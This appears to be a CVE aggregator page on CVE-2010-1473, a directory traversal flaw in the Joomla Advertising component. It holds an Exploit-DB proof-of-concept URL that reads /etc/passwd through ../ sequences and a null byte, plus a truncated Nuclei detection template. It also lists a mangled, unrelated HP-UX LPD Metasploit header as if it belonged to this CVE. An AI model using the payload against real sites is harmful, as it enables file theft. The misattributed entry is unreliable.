CVE-2010-1473
published 2010-04-19CVE-2010-1473: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly…
PriorityP342medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
8.16%
94.2th percentile
Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| johnmccollum | com_advertising | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP-UX LPD - Command Execution (Metasploit)
exploitdb·2010-10-06
CVE-2002-1473 HP-UX LPD - Command Execution (Metasploit)
HP-UX LPD - Command Execution (Metasploit)
---
##
# $Id: cleanup_exec.rb 10561 2010-10-06 00:53:45Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HP-UX LPD Command Execution',
'Description' => %q{
This exploit abuses an unpublished vulnerability in the
HP-UX LPD service. This flaw allows an unauthenticated
attacker to execute arbitrary commands with the privileges
of the root user. The LPD service is only exploitable when
the address of the attacking system can be resolved by the
target. This vulnerability was silently patched wit
Exploit-DB
Joomla! Component Advertising 0.25 - Local File Inclusion
exploitdb·2010-04-12
CVE-2010-1473 Joomla! Component Advertising 0.25 - Local File Inclusion
Joomla! Component Advertising 0.25 - Local File Inclusion
---
[o] Joomla Component Easy Ad Banner Local File Inclusion Vulnerability
Software : com_advertising version 0.25
Author : AntiSecurity [ Vrs-hCk NoGe OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/index.php?option=com_advertising&controller=[LFI]
[o] PoC
http://localhost/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11
[o] April 12 2010 - GMT +07:00 Jakarta, Indonesia
Nuclei
Joomla! Component Advertising 0.25 - Local File Inclusion
nuclei·CVSS 6.8
CVE-2010-1473 [MEDIUM] Joomla! Component Advertising 0.25 - Local File Inclusion
Joomla! Component Advertising 0.25 - Local File Inclusion
A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
Template:
id: CVE-2010-1473
info:
name: Joomla! Component Advertising 0.25 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized acces
2010-04-19
Published